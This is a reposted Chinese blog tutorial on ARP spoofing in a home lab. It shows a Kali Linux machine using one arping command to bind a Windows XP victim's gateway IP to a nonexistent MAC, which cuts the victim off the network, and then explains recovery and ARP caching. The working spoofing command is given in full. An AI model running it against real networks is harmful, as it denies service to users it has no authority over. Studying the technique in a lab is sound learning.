码迷,mamicode.com
首页 > 其他好文 > 详细

ARP欺骗-断网小技巧

时间:2020-06-25 23:14:46      阅读:57      评论:0      收藏:0      [点我收藏+]

标签:原理   访问   用户   欺骗   arp欺骗   存在   mac   arp   arping   

环境:

  • 攻击方: Kali Linux
  • 被攻击方: Windows XP
  • 二者在同一局域网下

步骤

1.查看Windows的IP,联网状态

在Windows的cmd终端输入

ipconfig

ping一下百度,可以看到能正常上网

ping baidu

技术图片

2.ARP欺骗

在 kali终端 输入

sudo arping -S 192.168.232.2 -s 00:00:00:00:00:00 192.168.232.129 (注意第二个s小写)

其中

*192.168.232.2是B的网关
*192.168.232.129是B的IP地址
*00:00:00:00:00:00任意不存在的MAC地址
技术图片

3.测试

在Windows的cmd终端输入

ping baidu

被攻击方Windows已断网
技术图片

4.如何恢复?

把对的MAC的值重新给B
技术图片


重启路由器

重启虚拟机

原理

我们首先了解下什么是MAC
在Windows的cmd终端输入

arp -a

技术图片
图中第二列为ARP的缓存列表,里面记录的是每个IP对应的网卡地址(MAC地址|也叫作物理地址)
我们知道IP地址是计算机的特有标识,但计算机上网靠的是网卡即MAC地址。
当我们上网时,ARP会发出广播‘谁是192.168.232.129 ?把你的MAC地址告诉我 !’。进而把IP和MAC对应起来,路由器把用户访问的数据发给MAC。对应IP获得数据。
而我们修改了MAC,相当于告诉ARP‘我是192.168.232.129,我的MAC地址是00:00:00:00:00:00’那数据就发到了一个不存在的地方,IP啥都没收到。
这个过程很像你淘宝购物时别人冒充你修改你的收货地址hhh。

ARP欺骗-断网小技巧

标签:原理   访问   用户   欺骗   arp欺骗   存在   mac   arp   arping   

原文地址:https://www.cnblogs.com/hugboy/p/13193219.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!